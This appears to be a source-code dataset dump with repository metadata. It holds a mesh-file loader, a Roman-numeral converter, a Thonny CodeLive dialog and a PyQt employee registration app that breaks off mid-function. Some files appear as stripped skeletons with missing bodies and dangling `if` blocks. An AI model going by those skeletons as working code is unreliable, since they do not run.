                # NOTE(review): .get(..., None) returns a bare None for an
                # unmapped name, which this tuple unpack would not accept —
                # confirm every bc.name is expected to be in name_mapper.
                bct, vdict = name_mapper.get(bc.name, None)
                if bct is not None:
                    bc = bct(bc=bc)
                    bc.feedValue(vdict)
            # save to block object.
            bc.sern = len(blk.bclist)
            bc.blk = blk
            blk.bclist.append(bc)
class NeutralIO(FormatIO):
    """
    Proxy to gambit neutral file format.
    """
    def load(self, stream, bcrej=None):
        """
        Load block from stream with BC mapper applied.
        @keyword stream: file object or file name to be read.
        @type stream: file or str
        @keyword bcrej: names of the BC to reject.
        @type bcrej: list
        @return: the loaded block.
        @rtype: solvcon.block.Block
        """
        import gzip
        # load gambit neutral file.
        if isinstance(stream, (bytes, str)):
            if stream.endswith('.gz'):
                # BUGFIX: open gzip in text mode; gzip.open defaults to
                # binary and the line-based reader expects str lines.
                stream = gzip.open(stream, 'rt')
            else:
                stream = open(stream)
        # Close the stream even when parsing raises (previous code leaked
        # the handle on error).
        try:
            neu = GambitNeutral(stream)
        finally:
            stream.close()
        # convert loaded neutral object into block object, keeping only
        # the BC names not explicitly rejected.
        if bcrej:
            onlybcnames = [bc.name for bc in neu.bcs if bc.name not in bcrej]
        else:
            onlybcnames = None
        blk = neu.toblock(onlybcnames=onlybcnames)
        return blk
if __name__ == '__main__':
    # Command-line smoke test: print a summary of a neutral file.
    import sys
    if len(sys.argv) > 1:
        fname = sys.argv[1]
        # BUGFIX: use a context manager so the file handle is released
        # (was `open(fname).read()` with no close).
        with open(fname) as fobj:
            neu = GambitNeutral(fobj.read())
        sys.stdout.write("Gambit Neutral object: %s" % neu)
        if neu.grps or neu.bcs:
            sys.stdout.write(", with:\n")
            for lst in neu.grps, neu.bcs:
                if len(lst) > 0:
                    for obj in lst:
                        sys.stdout.write(" %s\n" % obj)
        else:
            sys.stdout.write("\n")
    else:
        sys.stdout.write("usage: %s <file name>\n" % sys.argv[0])
| 6,463 | 0 | 446 |
243035aeca0c6a85e79daaadfae60f64bdf4e6f5 | 652 | py | Python | challenges/string/roman_to_integer.py | lukasmartinelli/sharpen | 6f314fc2aa17990ede04055e7c3ac9394a6c12c0 | [
"CC0-1.0"
] | 13 | 2017-04-24T23:27:16.000Z | 2020-05-25T22:41:42.000Z | challenges/string/roman_to_integer.py | lukasmartinelli/sharpen | 6f314fc2aa17990ede04055e7c3ac9394a6c12c0 | [
"CC0-1.0"
] | null | null | null | challenges/string/roman_to_integer.py | lukasmartinelli/sharpen | 6f314fc2aa17990ede04055e7c3ac9394a6c12c0 | [
"CC0-1.0"
] | 2 | 2017-05-27T08:55:28.000Z | 2018-08-11T08:54:51.000Z | symbol_lookup = {
'I': 1,
'V': 5,
'X': 10,
'L': 50,
'C': 100,
'D': 500,
'M': 1000
}
| 21.032258 | 60 | 0.588957 | symbol_lookup = {
'I': 1,
'V': 5,
'X': 10,
'L': 50,
'C': 100,
'D': 500,
'M': 1000
}
def roman_to_int(numeral):
    """Convert a Roman numeral string to its integer value.

    A symbol is subtracted when the following symbol is larger
    (subtractive notation, e.g. the I in IV); otherwise it is added.
    Characters missing from symbol_lookup contribute 0, and an empty
    string yields 0.
    """
    total = 0
    length = len(numeral)
    for pos, symbol in enumerate(numeral):
        value = symbol_lookup.get(symbol, 0)
        nxt = symbol_lookup.get(numeral[pos + 1], 0) if pos + 1 < length else 0
        total += -value if nxt > value else value
    return total
def test_roman_to_int():
    """Spot-check additive and subtractive Roman numeral forms."""
    cases = {'XIV': 14, 'XX': 20, 'MMXIV': 2014, 'MCMXC': 1990}
    for numeral, expected in cases.items():
        assert roman_to_int(numeral) == expected
| 492 | 0 | 46 |
8be4eeda0df3b06ac5cfd4b0cf3bbf40b176b899 | 11,091 | py | Python | thonnycontrib/codelive/views/create_session.py | codelive-project/thonny-codelive | 2f88d91d663982b7ca37eca5237ec97d772e56a8 | [
"MIT"
] | 5 | 2021-06-24T16:55:18.000Z | 2022-02-18T11:07:55.000Z | thonnycontrib/codelive/views/create_session.py | codelive-project/codelive | 2f88d91d663982b7ca37eca5237ec97d772e56a8 | [
"MIT"
] | 3 | 2021-04-01T20:40:42.000Z | 2021-10-20T16:53:12.000Z | thonnycontrib/codelive/views/create_session.py | codelive-project/thonny-codelive | 2f88d91d663982b7ca37eca5237ec97d772e56a8 | [
"MIT"
] | null | null | null | import tkinter as tk
from tkinter import ttk
from thonny import get_workbench
from thonnycontrib.codelive.mqtt_connection import generate_topic, topic_exists
from thonnycontrib.codelive.views.hinttext import HintText
from thonnycontrib.codelive.views.textspin import TextSpin
from thonnycontrib.codelive.mqtt_connection import BROKER_URLS
# For testing only!!!!!
if __name__ == "__main__":
if __name__ == "__main__":
root = tk.Tk()
button = tk.Button(root, text="Test", command=start_top)
button.pack(padx=20, pady=20)
root.mainloop()
| 31.87069 | 102 | 0.584167 | import tkinter as tk
from tkinter import ttk
from thonny import get_workbench
from thonnycontrib.codelive.mqtt_connection import generate_topic, topic_exists
from thonnycontrib.codelive.views.hinttext import HintText
from thonnycontrib.codelive.views.textspin import TextSpin
from thonnycontrib.codelive.mqtt_connection import BROKER_URLS
# For testing only!!!!!
if __name__ == "__main__":
class DummyEditor:
    """Minimal stand-in for a Thonny editor object, used when running
    this module directly for manual testing of the dialog."""

    def __init__(self, title="untitled", filename=None):
        # Mirror the two pieces of state the real editor API exposes.
        self.title = title
        self.filename = filename

    def get_title(self):
        """Return the editor tab title."""
        return self.title

    def get_filename(self):
        """Return the backing file path, or None when unsaved."""
        return self.filename
class EditorSelector(ttk.Frame):
    """Frame listing the currently open editors so the host can choose
    which ones to share in the session."""
    def __init__(self, parent, active_editors):
        # active_editors: dict of index -> editor object exposing
        # get_title() and get_filename().
        ttk.Frame.__init__(self, parent)
        self.active_editors = active_editors
        label = ttk.Label(self, text="Please choose the editors you want to share")
        container, self.editor_list = self.get_list()
        label.pack(side=tk.TOP)
        container.pack(side=tk.BOTTOM)
    def on_select_all(self):
        """Checkbutton handler: select or clear every row in the list."""
        # on uncheck
        if self.check_state.get() == 0:
            self.editor_list.selection_clear(0, self.editor_list.size() - 1)
            self.check_label.set("Select All")
        # on check
        else:
            self.editor_list.selection_set(0, self.editor_list.size() - 1)
            self.check_label.set("Unselect All")
    def get_list(self):
        """Build the scrollable multi-select listbox of editors and the
        select-all checkbutton; return (container frame, listbox)."""
        container = ttk.Frame(self)
        sub_container = ttk.Frame(container)
        scrollbar = tk.Scrollbar(sub_container)
        list_widget = tk.Listbox(
            sub_container,
            yscrollcommand=scrollbar.set,
            height=7,
            width=60,
            selectmode=tk.MULTIPLE,
        )
        scrollbar.configure(command=list_widget.yview)
        self.check_state = tk.IntVar()
        self.check_label = tk.StringVar()
        self.check_label.set("Select All")
        self.select_all_check = ttk.Checkbutton(
            container,
            command=self.on_select_all,
            textvariable=self.check_label,
            variable=self.check_state,
            onvalue=1,
            offvalue=0,
        )
        for item in self.active_editors:
            editor = self.active_editors[item]
            title = editor.get_title()
            filename = editor.get_filename() or "Unsaved"
            # Shorten long paths so each row stays within ~50 characters.
            if len(filename) + len(title) + 3 > 50:
                filename = "..." + filename[len(filename) - (len(title) + 6) :]
            label = " %s (%s) " % (title, editor.get_filename() or "Unsaved")
            list_widget.insert(tk.END, label)
        list_widget.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
        scrollbar.pack(side=tk.RIGHT, fill=tk.BOTH, expand=True)
        sub_container.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
        self.select_all_check.pack(side=tk.LEFT)
        return container, list_widget
    def get_shared_editors(self):
        """Return a generator over the editor objects whose listbox rows
        are currently selected."""
        return (self.active_editors[index] for index in self.editor_list.curselection())
    def none_selected(self):
        """Return True when no editor row is selected."""
        return len(self.editor_list.curselection()) == 0
class CreateSessionDialog(tk.Toplevel):
    """Modal dialog collecting what is needed to host a CodeLive session
    (alias, MQTT topic and broker, editors to share).

    On success ``self.data`` holds the collected values; on cancel it is
    set to None. The caller is expected to wait_window() on the dialog.
    """
    def __init__(self, parent):
        tk.Toplevel.__init__(self, parent)
        # Route the window-manager close button through the cancel flow.
        self.protocol("WM_DELETE_WINDOW", self.cancel_callback)
        self.title("Create Live Session - Beta")
        frame = ttk.Frame(self)
        self.data = dict()
        # Connection info
        Intro = ttk.Label(
            frame,
            text="Please provide information needed to start your new CodeLive Session.",
        )
        form_frame = ttk.Frame(frame, width=50)
        name_label = ttk.Label(form_frame, text="Your alias")
        self.name_input = HintText(form_frame)
        session_topic_label = ttk.Label(form_frame, text="Session Topic")
        self.topic_input = HintText(form_frame)
        broker_label = ttk.Label(form_frame, text="MQTT Broker")
        self.broker_input = TextSpin(form_frame, BROKER_URLS, mode="option")
        self.broker_input.bind("<<ValueChanged>>", self.broker_changed)
        self.auto_gen_topic_state = tk.IntVar()
        self.auto_generate_check = ttk.Checkbutton(
            form_frame,
            text="Auto-generate",
            command=self.auto_gen_callback,
            variable=self.auto_gen_topic_state,
            onvalue=1,
            offvalue=0,
        )
        self.default_broker_val = tk.IntVar()
        self.default_broker_val.set(1)
        self.default_broker_check = ttk.Checkbutton(
            form_frame,
            text="Built-In",
            command=self.default_broker_callback,
            variable=self.default_broker_val,
            onvalue=1,
            offvalue=0,
        )
        name_label.grid(row=0, column=0, sticky=tk.E)
        self.name_input.grid(row=0, column=1, sticky=tk.W, padx=10, pady=5)
        session_topic_label.grid(row=1, column=0, sticky=tk.E)
        self.topic_input.grid(row=1, column=1, sticky=tk.W, padx=10, pady=5)
        self.auto_generate_check.grid(row=1, column=3, sticky=tk.W)
        broker_label.grid(row=2, column=0, sticky=tk.E)
        self.broker_input.grid(row=2, column=1, sticky=tk.W + tk.E, padx=10, pady=5)
        self.default_broker_check.grid(row=2, column=3, sticky=tk.W)
        sep1 = ttk.Separator(frame, orient=tk.HORIZONTAL)
        # Shared editors frame
        self.editor_selector = EditorSelector(frame, self.get_active_editors(parent))
        sep2 = ttk.Separator(frame, orient=tk.HORIZONTAL)
        # Bottom Button Frame
        button_frame = ttk.Frame(frame)
        start_button = tk.Button(
            button_frame,
            text="Start!",
            command=self.start_callback,
            fg="green",
            width=10,
        )
        cancel_button = tk.Button(
            button_frame,
            text="Cancel",
            command=self.cancel_callback,
            fg="red",
            width=10,
        )
        start_button.pack(side=tk.RIGHT, fill=tk.X, expand=True, padx=5)
        cancel_button.pack(side=tk.LEFT, fill=tk.X, expand=True, padx=5)
        Intro.pack(expand=True, padx=10, pady=5)
        form_frame.pack(side=tk.TOP, expand=False, padx=10, pady=5)
        sep1.pack(side=tk.TOP, fill=tk.X, expand=True, padx=20)
        self.editor_selector.pack(side=tk.TOP, fill=tk.BOTH)
        sep2.pack(side=tk.TOP, fill=tk.X, expand=True, padx=20)
        button_frame.pack(side=tk.BOTTOM, padx=10, pady=5)
        frame.pack(fill=tk.BOTH, expand=True)
        self.center(parent.winfo_geometry())
    def center(self, parent_geo):
        """Center the fixed 650x350 dialog over the parent window, given
        the parent's "WxH+X+Y" geometry string."""
        parent_dim, parent_x, parent_y = parent_geo.split("+")
        parent_w, parent_h = [int(l) for l in parent_dim.split("x")]
        parent_x = int(parent_x)
        parent_y = int(parent_y)
        w = 650
        h = 350
        x = parent_x + (parent_w - w) / 2
        y = parent_y + (parent_h - h) / 2
        self.geometry("%dx%d+%d+%d" % (w, h, x, y))
    def get_active_editors(self, parent):
        """Return a dict of index -> editor for all open editors; dummy
        editors are used when the module runs standalone for testing."""
        editors = dict()
        # for testing only
        if __name__ == "__main__":
            editors = {
                0: DummyEditor(),
                1: DummyEditor("Hello"),
                2: DummyEditor(filename="hello path"),
                3: DummyEditor("Hello", "Hello's path"),
            }
        else:
            editors = {
                index: editor
                for (index, editor) in enumerate(
                    parent.get_editor_notebook().winfo_children()
                )
            }
        return editors
    def broker_changed(self, event = None):
        """Re-enable manual topic entry whenever the broker changes."""
        self.topic_input.state(tk.NORMAL)
        self.auto_gen_topic_state.set(0)
    def start_callback(self):
        """Validate all inputs; on success store them in self.data and
        close the dialog."""
        name = self.name_input.val()
        topic = self.topic_input.val()
        broker = self.broker_input.val()
        if (
            self.valid_name(name)
            and self.valid_connection(topic, broker)
            and self.valid_selection()
        ):
            self.data["name"] = name
            self.data["topic"] = topic
            self.data["broker"] = broker
            self.data["shared_editors"] = self.editor_selector.get_shared_editors()
            self.destroy()
    def cancel_callback(self):
        """Confirm with the user, then abandon the dialog (data -> None)."""
        if tk.messagebox.askokcancel(
            parent=self,
            title="Cancel Session",
            message="Are you sure you want to cancel hosting a CodeLive session?",
        ):
            self.data = None
            self.destroy()
    def default_broker_callback(self):
        """Toggle the broker widget between free text entry and the
        built-in broker option list."""
        is_text = self.default_broker_val.get() == 0
        self.broker_input.mode("text" if is_text else "option")
        self.broker_changed()
    def auto_gen_callback(self):
        """Checkbutton handler: generate a fresh topic and lock the
        field, or unlock it for manual entry."""
        # on uncheck
        if self.auto_gen_topic_state.get() == 0:
            self.topic_input.state(tk.NORMAL)
        # on check
        else:
            try:
                new_topic = generate_topic(self.broker_input.val())
                self.topic_input.val(new_topic)
                self.topic_input.state(tk.DISABLED)
            except TimeoutError as e:
                tk.messagebox.showerror(
                    master=get_workbench(),
                    title="Timeout error",
                    message="Rerquest timed out. Please try again."
                )
    def valid_name(self, s):
        """Return True when the alias has at least 8 characters; else
        show an error dialog and return False."""
        if len(s) < 8:
            tk.messagebox.showerror(
                parent=self,
                title="Error",
                message="Please provide a name at least 8 characters long.",
            )
            return False
        return True
    def valid_connection(self, topic, broker):
        """Return True when the topic/broker pair looks usable; else
        show an error dialog and return False."""
        if len(topic) < 12:
            tk.messagebox.showerror(
                parent=self,
                title="Error",
                message="Please provide a unique topic with more than 12 characters.",
            )
            return False
        if len(broker) < 12:
            tk.messagebox.showerror(
                parent=self, title="Error", message="Please provide a valid broker."
            )
            return False
        # TODO: replace with topic_exists(s) when topic_exists's logic is complete
        # NOTE(review): the message below contradicts the check —
        # topic_exists() returning True means the topic is already taken;
        # confirm the intended wording.
        if topic_exists(topic, broker):
            tk.messagebox.showerror(
                parent=self,
                title="Error",
                message="The topic doesn't exist. Make sure your topic is spelled correctly.",
            )
            return False
        return True
    def valid_selection(self):
        """Return True when at least one editor is selected to share;
        else show an error dialog and return False."""
        if self.editor_selector.none_selected():
            tk.messagebox.showerror(
                parent=self,
                title="Error",
                message="Please select at least one editor that would be shared during your session.",
            )
            return False
        return True
if __name__ == "__main__":
    # Manual smoke test: open the dialog from a bare Tk root window.
    root = tk.Tk()
    def start_top():
        # Launch the dialog and block until it is closed.
        top = CreateSessionDialog(root)
        root.wait_window(top)
    button = tk.Button(root, text="Test", command=start_top)
    button.pack(padx=20, pady=20)
    root.mainloop()
| 9,884 | 26 | 622 |
601a1d0ae895a74af9e09d812528cbcfd80da52f | 28,305 | py | Python | Registration2.py | Seeeev/Face-recognition-based-attendace-recording-system | 2b8dcc55319ea6e3ed95e2d59a921fc672181116 | [
"Apache-2.0"
] | 1 | 2019-04-25T14:34:57.000Z | 2019-04-25T14:34:57.000Z | Registration2.py | Seeeev/Face-recognition-based-attendace-recording-system | 2b8dcc55319ea6e3ed95e2d59a921fc672181116 | [
"Apache-2.0"
] | null | null | null | Registration2.py | Seeeev/Face-recognition-based-attendace-recording-system | 2b8dcc55319ea6e3ed95e2d59a921fc672181116 | [
"Apache-2.0"
] | null | null | null | from PyQt5.QtWidgets import QPushButton,QApplication, QWidget, QMessageBox
from PyQt5 import QtCore, QtGui, QtWidgets, uic
from PyQt5.QtCore import QTimer
from PyQt5.QtGui import QImage, QPixmap
import cv2
import DTR2
import os, subprocess
import ctypes
import sqlite3
import PySimpleGUI as sg
from PySimpleGUI import SetOptions
import TrainFaces
from easygui import enterbox
## subprocess.Popen(["python", "TrainFaces.py"])
## os._exit
if __name__=='__main__':
import sys
app=QtWidgets.QApplication(sys.argv)
window=Ui_Registration2()
window.show()
sys.exit(app.exec_())
| 54.328215 | 299 | 0.525985 | from PyQt5.QtWidgets import QPushButton,QApplication, QWidget, QMessageBox
from PyQt5 import QtCore, QtGui, QtWidgets, uic
from PyQt5.QtCore import QTimer
from PyQt5.QtGui import QImage, QPixmap
import cv2
import DTR2
import os, subprocess
import ctypes
import sqlite3
import PySimpleGUI as sg
from PySimpleGUI import SetOptions
import TrainFaces
from easygui import enterbox
class Ui_Registration2(QtWidgets.QMainWindow,QPushButton):
def __init__(self):
    """Load the Registration UI, prepare the employee database, and wire
    every widget callback."""
    super(Ui_Registration2,self).__init__()
    uic.loadUi('ui files/Registration.ui',self)
    self.id_saved = None
    # Run the database
    self.run_database()
    # View data from database
    self.view_data()
    self.x = []
    # Start Webcam -----------------------------------------------
    self.startButton.clicked.connect(self.start_cam)
    # ------------------------------------------------------------
    # Add actions to the menubar
    self.actionHome.triggered.connect(self.home)
    self.actionDaily_Time_Record.triggered.connect(self.dtr)
    # Get the data from the form
    self.pushButton_5.clicked.connect(self.get_data)
    # Train images
    self.trainButton.clicked.connect(self.train_data)
    self.clicked = True
    # Face Registration (used for recognizing an employee)
    self.faceRegister.clicked.connect(self.face_register)
    # Below are disabled fields until payrol system is implemented
    # NOTE(review): setEnabled()/setText() return None, so each of these
    # attributes is None — presumably only the widget side effect matters.
    self.salary = self.lineEdit_12.setEnabled(False)
    self.ratio = self.lineEdit_13.setEnabled(False)
    self.acc_no = self.lineEdit_14.setEnabled(False)
    self.pagibig_no = self.lineEdit_15.setEnabled(False)
    self.phil_health_no = self.lineEdit_16.setEnabled(False)
    self.gsis_no = self.lineEdit_17.setEnabled(False)
    self.salary = self.lineEdit_12.setText("Disabled for now")
    self.ratio = self.lineEdit_13.setText("Disabled for now")
    self.acc_no = self.lineEdit_14.setText("Disabled for now")
    self.pagibig_no = self.lineEdit_15.setText("Disabled for now")
    self.phil_health_no = self.lineEdit_16.setText("Disabled for now")
    self.gsis_no = self.lineEdit_17.setText("Disabled for now")
    # Take a picture of the employee
    self.save_idButton.clicked.connect(self.capture_image)
    # Search Employee
    self.pushButton_10.clicked.connect(self.searchEmployee)
    # Delete Employee
    self.pushButton_7.clicked.connect(self.deleteEmployee)
    # Edit Employee
    self.pushButton_8.clicked.connect(self.editEmployee)
    # View data from database
    self.view_data()
    # Lock an employee
    self.inactiveButton.clicked.connect(self.lockEmployee)
    # List of locked employee
    self.inactiveEmployees.clicked.connect(self.inactive_emp_list)
    # Close Window
    self.closeButton.clicked.connect(self.closeWindow)
def start_cam(self):
    """Open the default webcam at 316x180 and start a 5 ms timer that
    keeps refreshing the preview frame."""
    self.capture=cv2.VideoCapture(0)
    self.capture.set(cv2.CAP_PROP_FRAME_HEIGHT,180)
    self.capture.set(cv2.CAP_PROP_FRAME_WIDTH,316)
    self.timer = QTimer()
    self.timer.timeout.connect(self.update_frame)
    self.timer.start(5)  # fire every 5 ms
def update_frame(self):
ret,self.image=self.capture.read()
self.image=cv2.flip(self.image,1)
# Display Image Function
self.displayImage(self.image,1)
return self.image
def displayImage(self,img,window=1):
    """Convert an OpenCV BGR/BGRA image to a QImage and display it in
    the preview frame when window == 1."""
    qformat=QImage.Format_Indexed8
    if len(img.shape)==3: #[0]=rows, [1]=cols [2]=channels
        if img.shape[2]==4:
            qformat=QImage.Format_RGBA8888
        else:
            qformat=QImage.Format_RGB888
    outImage=QImage(img,img.shape[1],img.shape[0],img.strides[0],qformat)
    #BRG to RGB
    outImage=outImage.rgbSwapped()
    if window==1:
        self.frame_2.setPixmap(QPixmap.fromImage(outImage))
        self.frame_2.setScaledContents(True)
def capture_image(self):
    """Prompt for an employee ID, validate it against tb_emp_info, and
    save the current webcam frame as "Employee IDs/<id>.png"."""
    # BUGFIX: the read-only connection was previously never closed.
    conn = sqlite3.connect('db_employees.db')
    try:
        c = conn.cursor()
        c.execute("""SELECT empID FROM tb_emp_info""")
        id_list = c.fetchall()
    finally:
        conn.close()
    while True:
        current_id = enterbox(msg='Please enter your ID.', title=' ', default='', strip=True)
        # id_list rows are 1-tuples, so `in item` is an equality test.
        if any(item for item in id_list if current_id in item):
            cv2.imwrite("Employee IDs/"+current_id+".png",self.update_frame())
            ctypes.windll.user32.MessageBoxW(0, " ID Saved Successfuly", "Success", 0)
            break
        elif current_id is None:  # user pressed Cancel
            break
        else:
            ctypes.windll.user32.MessageBoxW(0, " Invalid ID!", "Error", 0)
def dtr(self):
    """Open the Daily Time Record window (menu action handler)."""
    # Kept as an attribute so the window is not garbage-collected.
    self.ui = DTR2.Ui_DTR2()
    self.ui.show()
def home(self):
    """Launch the main (home) screen as a separate Python process."""
    subprocess.Popen(["python", "main.py"])
    # NOTE(review): attribute access only — os._exit is never called, so
    # this line has no effect; confirm whether an exit was intended.
    os._exit
def get_data(self):
    """Validate the registration form and, when every field passes,
    insert a new employee row into tb_emp_info and refresh the table."""
    conn = sqlite3.connect('db_employees.db')
    c = conn.cursor()
    c.execute("""SELECT empID from tb_emp_info""")
    id_list = c.fetchall()
    current_id = self.lineEdit.text()
    if self.lineEdit.text().isdigit():
        # id_list rows are 1-tuples, so `in item` is an equality test.
        if any(item for item in id_list if current_id in item):
            ctypes.windll.user32.MessageBoxW(0, " ID already exists", "Error", 0)
        else:
            self.empID = self.lineEdit.text()
        if len(self.lineEdit_2.text()) == 0:
            ctypes.windll.user32.MessageBoxW(0, " Empty field in Last Name", "Error", 0)
        elif len(self.lineEdit_3.text()) == 0:
            ctypes.windll.user32.MessageBoxW(0, " Empty field in First Name", "Error", 0)
        elif len(self.lineEdit_4.text()) == 0:
            ctypes.windll.user32.MessageBoxW(0, " Empty field in Middle Name", "Error", 0)
        elif len(self.lineEdit_5.text()) == 0:
            ctypes.windll.user32.MessageBoxW(0, " Empty field in Address ", "Error", 0)
    else:
        ctypes.windll.user32.MessageBoxW(0, " Enter a valid Employee ID", "Error", 0)
    # NOTE(review): this check does not exclude an already-existing ID,
    # so a duplicate ID with all fields filled would still be inserted;
    # also, when validation fails the connection is never closed — confirm.
    if (self.lineEdit.text().isdigit() and len(self.lineEdit_2.text())>0 and len(self.lineEdit_3.text())>0 and len(self.lineEdit_4.text()) > 0 and len(self.lineEdit_5.text())>0):
        # Get the inputs from the user and store it in variables
        self.l_name = self.lineEdit_2.text()
        self.f_name= self.lineEdit_3.text()
        self.m_name = self.lineEdit_4.text()
        self.gender = self.comboBox.currentText()
        self.civil_status = self.comboBox_2.currentText()
        self.job_desc = self.comboBox_3.currentText()
        self.position = self.comboBox_4.currentText()
        self.campus = self.comboBox_5.currentText()
        self.dept = self.comboBox_6.currentText()
        self.address = self.lineEdit_5.text()
        self.dependent_type = self.comboBox_7.currentText()
        self.soa = self.comboBox_8.currentText()
        self.emp_status = self.comboBox_9.currentText()
        self.date_hired = self.dateEdit.date().toPyDate()
        self.date_of_birth = self.dateEdit_2.date().toPyDate()
        # Pull the data from the registration form and it in the database
        c.execute("""INSERT INTO tb_emp_info VALUES (:empID, :l_name, :f_name, :m_name, :gender,
            :civil_status, :job_desc, :position, :campus, :dept, :address, :dependent_type,
            :soa,:emp_status, :date_hired, :date_of_birth)""",
            {'empID':self.empID, 'l_name':str(self.l_name), 'f_name':str(self.f_name),
            'm_name':str(self.m_name), 'gender':str(self.gender),
            'civil_status':str(self.civil_status), 'job_desc':str(self.job_desc),
            'position':str(self.position), 'campus':str(self.campus), 'dept':str(self.dept),
            'address':str(self.address),'dependent_type':str(self.dependent_type), 'soa':str(self.soa),
            'emp_status':str(self.emp_status),'date_hired':str(self.date_hired),
            'date_of_birth':str(self.date_of_birth)})
        conn.commit()
        self.view_data()
        # Clear form
        c.close()
        conn.close()
        self.lineEdit.setText(None)
        self.lineEdit_2.setText(None)
        self.lineEdit_3.setText(None)
        self.lineEdit_4.setText(None)
        self.lineEdit_5.setText(None)
        # Confirmation Message
        ctypes.windll.user32.MessageBoxW(0, " You are now registered. Please move to the Face Registration", "Success", 0)
def run_database(self):
    """Create the SQLite database file (if missing) and all required tables.

    Tables:
      tb_emp_info     - active employees' personal/employment details
      tb_transaction  - daily time-in/time-out records
      tb_lates        - individual tardiness records
      tb_emp_inactive - archived (disabled) employees, same schema as tb_emp_info

    Fixes over the original: the last two CREATE TABLE statements were never
    committed, and the cursor/connection were never closed.
    """
    conn = sqlite3.connect('db_employees.db')
    c = conn.cursor()
    # Employee's Information Table
    c.execute("""CREATE TABLE IF NOT EXISTS tb_emp_info(empID TEXT,
                    l_name TEXT,
                    f_name TEXT,
                    m_name TEXT,
                    gender TEXT,
                    civil_status TEXT,
                    job_desc TEXT,
                    position TEXT,
                    campus TEXT,
                    dept TEXT,
                    address TEXT,
                    dependent_type TEXT,
                    soa TEXT,
                    emp_status TEXT,
                    date_hired TEXT,
                    date_of_birth TEXT)""")
    # Transaction Table
    c.execute("""CREATE TABLE IF NOT EXISTS tb_transaction(empID TEXT,
                    date TEXT,
                    am_in TEXT,
                    am_out TEXT,
                    pm_in TEXT,
                    pm_out TEXT,
                    Tardy TEXT,
                    Undertime TEXT)""")
    # Table for number of lates
    c.execute("""CREATE TABLE IF NOT EXISTS tb_lates(empID TEXT,
                    month TEXT,
                    day TEXT,
                    year TEXT,
                    time TEXT,
                    note TEXT)""")
    # Table for inactive employees
    c.execute("""CREATE TABLE IF NOT EXISTS tb_emp_inactive(empID TEXT,
                    l_name TEXT,
                    f_name TEXT,
                    m_name TEXT,
                    gender TEXT,
                    civil_status TEXT,
                    job_desc TEXT,
                    position TEXT,
                    campus TEXT,
                    dept TEXT,
                    address TEXT,
                    dependent_type TEXT,
                    soa TEXT,
                    emp_status TEXT,
                    date_hired TEXT,
                    date_of_birth TEXT)""")
    # One commit covers all DDL above (the original missed the last two
    # tables); then release the database resources.
    conn.commit()
    c.close()
    conn.close()
def view_data(self):
    """Reload the employee table widget with all active employees.

    Fix over the original: the sqlite connection was never closed; rows are
    now fetched eagerly so the connection can be released before the widget
    is populated.
    """
    conn = sqlite3.connect('db_employees.db')
    query = "SELECT empID, l_name, f_name, m_name, gender, civil_status, job_desc, position, campus, dept, address FROM tb_emp_info"
    result = conn.execute(query).fetchall()
    conn.close()
    self.tableWidget.setRowCount(0)
    for row_number, row_data in enumerate(result):
        self.tableWidget.insertRow(row_number)
        for column_number, data in enumerate(row_data):
            self.tableWidget.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
def train_data(self):
    """(Re)train the face-recognition model from the registered face images."""
    TrainFaces.train()
def face_register(self):
    """Launch the face-registration tool as a separate process.

    Fixes over the original: the bare ``os._exit`` statement was a no-op
    (the function object was referenced but never called) and has been
    removed; the child process now uses the current interpreter
    (``sys.executable``) instead of whatever ``python`` resolves to on PATH.
    """
    import sys  # local import: only needed here
    subprocess.Popen([sys.executable, "FaceRegister.py"])
def searchEmployee(self):
    """Filter the employee table by the field selected in comboBox_10.

    Fixes over the original: every branch after the first referenced the
    undefined name ``SearchOption`` (capital S) and raised NameError; the
    query/refresh code was duplicated five times; the connection was never
    closed. An empty search string (or an unrecognised option) falls back
    to showing the full list, as before.
    """
    searchOption = self.comboBox_10.currentText()
    searchInput = self.lineEdit_6.text()
    # Map each combo-box option to the column it searches. The column name
    # interpolated into the SQL below comes from this map only, never from
    # user input; the user-supplied value is bound as a parameter.
    columns = {
        'Employee ID': 'empID',
        'First Name': 'f_name',
        'Last Name': 'l_name',
        'Department': 'dept',
        'Position': 'position',
    }
    column = columns.get(searchOption)
    if column is None or searchInput == "":
        self.view_data()
        return
    conn = sqlite3.connect('db_employees.db')
    c = conn.cursor()
    c.execute(
        "SELECT empID, l_name, f_name, m_name, gender, civil_status, "
        "job_desc, position, campus, dept, address FROM tb_emp_info "
        "WHERE %s=?" % column,
        (searchInput,),
    )
    result = c.fetchall()
    c.close()
    conn.close()
    self.tableWidget.setRowCount(0)
    for row_number, row_data in enumerate(result):
        self.tableWidget.insertRow(row_number)
        for column_number, data in enumerate(row_data):
            self.tableWidget.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
def deleteEmployee(self):
    """Permanently delete the selected employee after user confirmation.

    Fixes over the original: removed leftover debug ``print`` calls and the
    unused ``count``/``data_`` locals, and the connection is now closed.
    """
    try:
        data = self.tableWidget.selectedItems()
        empID = data[0].text()  # raises IndexError when nothing is selected
        choice = ctypes.windll.user32.MessageBoxW(0, "Are you sure you want to delete this employee? All his/her data will be lost.", "Confirmation", 1)
        if choice == 1:  # user pressed OK
            conn = sqlite3.connect('db_employees.db')
            c = conn.cursor()
            c.execute("""DELETE FROM tb_emp_info WHERE empID=?""", (empID,))
            conn.commit()
            c.close()
            conn.close()
            ctypes.windll.user32.MessageBoxW(0, " Employee successfuly deleted!", "Success!", 0)
            self.view_data()
    except IndexError:
        ctypes.windll.user32.MessageBoxW(0, " No employee selected!", "Error!", 0)
def editEmployee(self):
    """Open a PySimpleGUI dialog pre-filled with the selected employee's
    record and persist any changes back to tb_emp_info.

    Loops re-showing the dialog until the user cancels, or submits a form
    with no empty field.

    NOTE(review): ``SetOptions`` is called unqualified while every other
    GUI call uses the ``sg.`` prefix -- presumably a star-import of
    PySimpleGUI exists at module level; verify.
    NOTE(review): the sqlite connection opened here is never closed.
    """
    # Execute if row is selected in the list of employees
    if len(self.tableWidget.selectedItems()) != 0:
        data = self.tableWidget.selectedItems()
        empID = data[0].text()
        conn = sqlite3.connect('db_employees.db')
        c = conn.cursor()
        # Load the full 16-column record of the selected employee.
        empInfo=c.execute("""SELECT * FROM tb_emp_info WHERE empID=?""",(empID,)).fetchall()
        empID = empInfo[0][0]
        l_name = empInfo[0][1]
        f_name = empInfo[0][2]
        m_name = empInfo[0][3]
        gender = empInfo[0][4]
        civil_status = empInfo[0][5]
        job_desc = empInfo[0][6]
        position = empInfo[0][7]
        campus = empInfo[0][8]
        dept = empInfo[0][9]
        address = empInfo[0][10]
